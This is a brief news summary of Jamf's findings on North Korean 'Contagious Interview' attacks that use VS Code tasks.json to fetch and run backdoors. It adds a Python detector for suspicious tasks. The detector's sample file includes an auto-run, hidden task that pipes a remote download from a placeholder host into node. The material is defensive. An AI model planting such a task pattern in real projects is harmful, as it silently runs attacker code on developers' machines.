HeadlinesBriefing.com

Hackers Weaponize Visual Studio Code for Malware Delivery

Hacker News: Front Page

Jamf Threat Labs uncovered new Visual Studio Code abuse in the Contagious Interview campaign, linked to North Korean actors. Attackers use malicious `tasks.json` files to trigger JavaScript-based backdoors when developers open compromised repositories.

The infection chain starts when victims clone repositories hosted on GitHub or GitLab, often disguised as job applications. Opening these projects in VS Code triggers background shell commands that fetch payloads from domains like `vercel.app`, executing them via Node.js without user interaction.

Payloads include obfuscated JavaScript with unused code likely meant to evade detection. Core functions enable persistent command-and-control communication, system fingerprinting, and remote code execution. Some samples show signs of AI-assisted development and can self-terminate processes on demand.

Security teams should monitor for unusual task configurations in developer environments. As attackers embed malware deeper into legitimate workflows, traditional endpoint defenses may miss these early-stage compromises targeting engineers directly.
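
One way to act on the monitoring advice above, as an added example rather than code from Jamf or this article: a Python check that parses a repository's `.vscode/tasks.json` and flags tasks that run on folder open, fetch remote content, or hide their terminal output. `runOn: folderOpen` and `reveal: never` are VS Code task settings; the flagging heuristics, function names and sample file are assumptions made for illustration.

```python
import json
import re

# Heuristics below are assumptions for illustration, not indicators from the report.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)
FETCHER = re.compile(r"\b(curl|wget|node|bash|sh|powershell)\b", re.I)
URL = re.compile(r"https?://[^\s\"'|;)]+", re.I)

def parse_jsonc(text):
    """tasks.json allows comments and trailing commas; strip them outside strings."""
    for _ in range(2):  # second pass catches commas that preceded a comment
        text = TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)
    return json.loads(text)

def command_text(task):
    """Join command and args, including the windows/osx/linux overrides."""
    parts = []
    for scope in [task] + [task.get(k) or {} for k in ("windows", "osx", "linux")]:
        parts.append(str(scope.get("command", "")))
        for arg in scope.get("args", []):
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)

def audit_tasks(text):
    """Return [(label, [reasons])] for tasks worth a manual look."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        cmd, reasons = command_text(task), []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically on folder open")
        url = URL.search(cmd)
        if url and FETCHER.search(cmd):
            reasons.append("fetches remote content from " + url.group(0))
        if (task.get("presentation") or {}).get("reveal") == "never":
            reasons.append("terminal output hidden")
        if reasons:
            findings.append((task.get("label", "<unlabelled>"), reasons))
    return findings

# Constructed sample (not from a real repository); example.invalid is a placeholder.
SAMPLE = r'''{
  "version": "2.0.0",  // constructed for this example
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "env-check", "type": "shell",
     "command": "curl -s https://cdn.example.invalid/setup | node",
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"},},
  ]
}'''
```

Calling `audit_tasks(SAMPLE)` reports only the `env-check` task, with all three reasons; the plain `build` task is not flagged.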